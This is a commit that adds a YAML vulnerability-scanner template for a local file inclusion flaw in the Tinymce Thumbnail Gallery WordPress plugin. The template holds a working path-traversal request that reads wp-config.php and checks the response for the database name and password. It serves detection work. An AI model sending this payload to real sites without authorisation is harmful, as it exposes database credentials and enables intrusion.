Merge pull request #2995 from Akokonunes/patch-63

Create wp-tinymce-thumbnail-plugin-lfi.yaml
2021-10-27 00:13:01 +05:30 · 2021-10-27 00:13:01 +05:30 · ac70e14788
parent 7ccaf4c07a b928d9a269
commit ac70e14788
1 changed files with 29 additions and 0 deletions
--- a/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
@ -0,0 +1,29 @@
+id: wp-tinymce-lfi
+
+info:
+  name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
+  author: 0x_Akoko
+  severity: high
+  description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
+    - http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
+  tags: wordpress,wp-theme,lfi,wordpress,tinymce
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200